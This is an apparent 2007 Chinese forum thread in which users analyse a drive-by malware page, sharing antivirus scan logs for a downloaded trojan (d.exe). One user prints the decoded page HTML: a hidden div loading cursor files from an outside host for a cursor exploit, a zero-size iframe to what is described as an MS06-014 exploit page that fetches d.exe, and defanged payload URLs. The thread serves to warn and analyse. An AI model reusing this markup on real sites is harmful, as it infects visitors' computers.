饿~一个病毒网站

电影结束了

今天给同学弄清楚Windows Genuine Advantage 时淘到的
http://ruan5.mxarticle.com/102244.html

aribeth199

咖啡报5个

gggh

卡巴不杀..?

蓝色牛仔裤

改用火狐了, 毒网都没用了...一片寂静....

小邪邪

利用光标漏洞，mcafee

blackfox

我踏进去了，没什么事儿啊！Opera

黑衣~魂

肯定有問題的~
這個惡意連結加密方式我不會解,高手幫一下吧
ttp://18dmm.com/dm/kehu0746.htm(不知道會不會跟下面一樣~)

他利用的零差樣本中分析出d.exe~

問題集中在
主要在ttp://s2k2clan.com/da/mxarticle1.js
ttp://s2k2clan.com/da/mxarticle2.js
ttp://s2k2clan.com/da/all51.js
ttp://s2k2clan.com/da/web2/51.js

McAfee 已自動封鎖並隔離 特洛伊病毒。
詳細資料
偵測: New Malware.n (特洛伊病毒)
檔案路徑: C:\Documents and Settings\all.HOME-\桌面\d.exe

电影结束了

扫描系统区域...
扫描所选择的目录和文件...
对象: d.exe
        在压缩档案里: C:\Documents and Settings\wangcheng\桌面\d.rar
        Status: 已发现病毒
        病毒: Trojan-Downloader.Win32.Delf.bhe (KAV 引擎), Generic.Malware.WBdld.C5FE310E (BD 引擎)
对象: d.rar
        路径: C:\Documents and Settings\wangcheng\桌面
        Status: 已发现病毒
        病毒: Trojan-Downloader.Win32.Delf.bhe (KAV 引擎), Generic.Malware.WBdld.C5FE310E (BD 引擎)
扫描完成: 2007-4-4 19:28
    已检查 1 个文件
    已发现 1 个染毒文件
    发现 0 个可疑文件

dikex

原帖由 黑衣~魂 于 2007-4-4 19:20 发表
肯定有問題的~

ttp://18dmm.com/kehu07462_files/run.js

這個惡意連結加密方式我不會解,高手幫一下吧
ttp://18dmm.com/dm/kehu0746.htm(不知道會不會跟下面一樣~)

他利用的零差樣本中分析出d.exe~

問題集中在
主要在ttp://s2k2clan.com ...

关于那个的解密其实很简单
打开后选择另存为——编码选择“GB2132”——保存，再用记事本打开那个网页即可查看到源代码（相对路径会被换掉）

1. <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   
2. <HTML><HEAD>
   
3. <META http-equiv=Content-Type content="text/html; charset=gb2312">
   
4. <META content="MSHTML 6.00.6000.16414" name=GENERATOR></HEAD>
   
5. <BODY>
   
6. <DIV id=new_content_jp style="DISPLAY: none">
   
7. <DIV style="CURSOR: url('http://18dmm.com/kehu/1.jpg')">
   
8. <DIV style="CURSOR: url('http://18dmm.com/kehu/2.jpg')"></DIV></DIV></DIV>
   
9. <SCRIPT language=javascript src="kehu07462_files/run.js"></SCRIPT>
   
10. <IFRAME src="kehu07462_files/down1.htm" width=0 height=0></IFRAME>
    
11. <SCRIPT language=javascript src="kehu07462_files/935897.js"
    
12. type=text/javascript></SCRIPT>
    
13. <NOSCRIPT><A href="http://www.51.la/?935897" target=_blank><IMG
    
14. style="BORDER-RIGHT: medium none; BORDER-TOP: medium none; BORDER-LEFT: medium none; BORDER-BOTTOM: medium none"
    
15. alt=我要啦免费统计 src="kehu07462_files/sCA05JGL7.htm"></A></NOSCRIPT> </BODY></HTML>

复制代码

另外在保存那个网页时会自动把代码里面挂着的网页和脚本文件保存在同一目录的那个网页的附属文件夹里面；

其中run.js再此挂上了http://18dmm.com/kehu/1.jpg和http://18dmm.com/kehu/2.jpg；
down1.htm是一个MS06-014网马，再此挂上了http://www.18dmm.com/kehu/d.exe；
935897.js是所谓的弹出联盟的东西，用于弹出窗口卖广告；
sCA05JGL7.htm其实一个gif文件，改了后缀即可看到原来的样子。

[ 本帖最后由 dikex 于 2007-4-4 20:22 编辑 ]

mofunzone

Starting the file scan:

Begin scan in 'C:\Documents and Settings\morgan\My Documents\d.rar'
C:\Documents and Settings\morgan\My Documents\
  d.rar
    [0] Archive type: RAR
    --> d.exe
        [DETECTION] Is the Trojan horse TR/Delphi.Downloader.Gen
        [WARNING]   Infected files in archives cannot be repaired!
        [INFO]      The file was deleted!